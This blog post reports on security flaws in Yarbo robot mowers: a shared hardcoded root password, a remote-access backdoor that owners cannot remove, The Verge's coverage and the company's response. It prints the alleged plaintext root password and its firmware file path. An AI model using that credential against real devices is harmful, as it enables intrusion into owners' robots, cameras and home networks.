dec5
All notes
·3 min read·
  • security
  • iot
  • robotics
  • cybersecurity
  • the-verge

The Yarbo Robot Mower Security Scandal: Hardcoded Password, Backdoor, and The Verge Investigation

Security researchers found a fleet-wide hardcoded root password and an owner-irrevocable remote-access backdoor in Yarbo robot mowers. The Verge's report, Yarbo's response, and what it means for IoT security at large.

Watch on Instagram

The "smart garden" pitch behind robot lawn mowers just produced an ugly IoT-security story. Yarbo — a popular garden robot marketed with toolless cargo accessories, snow-blower attachments and lawn-mowing modes — has been pushed to the edge of a cliff by security researchers who found a fleet-wide hardcoded root password and a remote-access backdoor that owners cannot disable. The Verge laid out the full scope, and Yarbo's response follows a familiar industry script.

One password, thousands of robots

Researchers Makris and Petach discovered that Yarbo's firmware contains a credential-updater that sets the same root password on every device. The string is plain-text: hy@8886!#, in v1.0.3 of Yarbo's own Greengrass component. Path: userdata/greengrass/v2/packages/artifacts/credential_updater/1.0.3/x.update.credentials.sh, line 77.

What this means: every Yarbo robot in the field shares one root password. Anyone who recovers it can, in principle, reach all of them.

Owners can't fix it — by design

This isn't just one bad password choice. Yarbo's firmware update mechanism resets the root password to default on every update, even if the owner manually set a stronger one. Self-defence is technically impossible.

Worse: Petach says Yarbo intentionally shipped a remote-access backdoor — "deployed automatically to every robot, cannot be disabled by the owner, and is actively restored if removed." Discovering it and deleting it isn't a fix; the firmware brings it back.

Petach's reaction in one line: "Wow, that's even worse than I thought."

The Verge — "A hacker ran me over with a robot lawn mower"

The Verge's reporter Andreas published the story under the headline "A hacker ran me over with a robot lawn mower." A map of affected devices marks hundreds of points across California — San Francisco, Sacramento, Fresno, Bakersfield. Because the same backdoor lets a third party send remote commands, physical safety is now also on the table.

The story isn't just "my robot got hacked"; cameras, WiFi PSKs, and personal data stored on the device are all reachable from the same SSH session.

Yarbo's official response

Yarbo's first email (signed "Bryan, Team Yarbo") followed the classic IoT defence: "We take these matters seriously... remote access is conducted strictly under authorized service conditions, when a customer explicitly requests assistance." A day after publication, the company announced a broader plan:

  • In-app customer approval mechanism
  • Clearer session visibility and stronger audit logging
  • Customer-facing access history
  • A dedicated Security Response Center on their website
  • A bug bounty program

The Verge's caveat is telling: "though it may stop short of disabling remote access entirely." Whether the backdoor is fully removed or merely better-logged is still unclear.

Why this matters for IoT security

This isn't a single-vendor mistake. It's a case study of structural antipatterns the connected-device market keeps repeating:

  • Hardcoded credentials — easy in development, catastrophic in production.
  • Firmware updates resetting the root password — an antipattern that makes user-side hardening impossible.
  • Owner-irrevocable remote backdoors — sold as "remote support," in practice they hollow out the concept of ownership.
  • PR defence first, real fix when pressured — industry standard, but it expands quickly under outlets like The Verge.

If you own a Yarbo today: the simplest mitigation is a VLAN with no direct internet egress to Yarbo's cloud. Until the company ships a complete fix, network-side isolation is the safer move.

The takeaway

Smart garden robots, robot vacuums, IP cameras, smart locks — same category. Once your device is online, the manufacturer's firmware policy is stronger than your security policy. The Yarbo scandal makes a practice the IoT market quietly tolerates suddenly visible.

What's your take — would you trust Yarbo after this? In the bigger question: would you buy a connected garden device on purpose, or pick the "no-internet" variant?